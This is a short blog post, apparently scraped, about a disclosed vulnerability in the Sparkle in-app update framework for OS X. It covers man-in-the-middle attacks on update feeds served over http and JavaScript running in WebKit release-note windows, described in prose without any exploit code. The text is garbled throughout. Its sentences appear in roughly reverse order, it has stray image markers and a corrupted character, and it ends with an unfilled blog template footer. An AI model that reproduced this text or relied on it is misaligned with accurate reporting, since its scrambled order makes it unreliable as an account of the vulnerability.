![]() The XML file’s update payload can include JavaScript that’s directly executed in that WebKit window, opening a browser and running code that could open a webpage that has zero-day malware-exploits that haven’t been patched yet. That suborned response not only could show false information and lead people to install malware, but it can also take advantage of a second vulnerability that’s part of OS X’s WebKit, which Sparkle uses to display formatted update information in a pop-up window in an app. Karpowicz notes that an attacker could provide an alternate XML update file in response to a Sparkle check. MitM for unencrypted connections just requires a position where traffic can be examined and substituted. ![]() This can happen on a public Wi-Fi network, business networks that lack good internal controls, and at higher-level Internet hubs when malicious parties gain access or governments demand it or control them. The first is that developers using Sparkle with http instead of https allow a man-in-the-middle (MitM) attack that would allow a malicious party to redirect the request without detection, unlike with https. Researcher Radosław Karpowicz (who goes by Radek) discovered two separate vulnerabilities. The Sparkle framework checks an XML-based update feed that’s hosted at the app developer’s site, and whenever a release number appears higher than the current version, notifies a user with release notes, and allows a one-click operation to download, quit the app, install the update, and relaunch. Apps could offer preferences to let apps routinely check for updates automatically (as well as have a manual Check for Updates option). This free, open-source code module was initially created by a single developer in 2006 (now handed off to a team) as a way to allow in-app updates of software that had the ease of app stores: Instead of having to check on updates or be on a mailing list about them, and then download new releases from a website and run an installer, Sparkle automated all that within the program. App developers who still use http for Sparkle connections need to update their software and release new versions immediately with https, and ultimately (and soonish) incorporate the newest Sparkle release. The Sparkle project coordinators have already released an update that disables vectors under their control, although they still exist in OS X-they’re just much harder to take advantage of without Sparkle providing a pathway. Reported first on the researcher’s post, which went up in late January.) But the attack works because of three separate OS X issues: executing JavaScript in WebKit views intended to show formatted text mounting FTP servers on the desktop and Gatekeeper not checking certain paths for and kinds of downloaded files. Because Sparkle allows apps to update via non-encrypted web connections, the potential of sending malicious updates through man-in-the-middle attacks is quite high. Sparkle update framework for OS X Yosemite and El Capitan. A researcherĭisclosed several days ago a vulnerability hiding in plain sight with the The drumbeat of avoiding insecure “http” web connections beats every louder.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |